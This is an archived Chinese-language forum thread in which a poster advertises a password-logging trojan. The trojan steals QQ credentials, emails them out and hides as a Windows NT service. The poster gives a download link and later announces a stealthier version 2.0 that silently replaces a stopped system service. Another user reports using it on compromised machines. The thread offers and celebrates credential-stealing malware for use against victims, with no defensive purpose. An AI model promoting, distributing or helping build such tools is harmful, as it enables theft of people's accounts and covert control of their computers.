20CN网络安全小组第一代论坛: 一个超级密码记录木马

这是在 20CN网络安全小组第一代论坛 的论坛 木马园地 中的主题 一个超级密码记录木马。

要查看这个主题，请使用这个 URL:
http://www.20cn.net/cgi-bin/ubb/ultimatebb.cgi?ubb=get_topic;f=8;t=000122

由 47090005 (编号: 619) 发表于 :

该木马是用来监听各种密码的，如QQ号和密码，有自动发信功能，和top差不多，它的特点是把自己加到windows nt服务中，非常具有隐蔽性，如果在创建服务时不提供停止和删除功能，你即使知道种了木马也没有办法删除它，是不是很厉害？有兴趣的朋友可以到 http://yyt_hac.home.chinaren.com去下载测试版，多提些建议和看法，让我们共同来完善它

由 x-ray (编号: 1025) 发表于 :

呵呵
用冰河连上自己，一定可以删掉的，先删进程，再删程序

由 47090005 (编号: 619) 发表于 :

hi,那是服务进程，在本机是结束不了的，难道用冰河连上能结束吗？

由风起 (编号: 30) 发表于 :

一物降一物,

服务进程就不能够删吗?

API应该是可以搞定的吧.?

由没影 (编号: 14) 发表于 :

风起：说具体点啊，我怀疑自己中了

由 x-ray (编号: 1025) 发表于 :

quote:
发贴人：风起:
一物降一物,
服务进程就不能够删吗?

API应该是可以搞定的吧.?

是啦,风起啊,怎么用IPA搞定呢?

由 yyt_hac (编号: 619) 发表于 :

不错，服务进程也是可以被杀掉的，现在黑暗天使2.0以进入调试阶段，它会随机选择一个状态为停止的系统服务并替换掉它，而被替换的服务属性看不出任何改变，而且任务管理器中也看不到任何增加的进程，够狠了吧

由 yyt_hac (编号: 619) 发表于 :

黑暗天使2.0已经出来了，快去下载吧

由没影 (编号: 14) 发表于 :

我下了，效果很好，可以登陆肉鸡，就看邮件内容喽！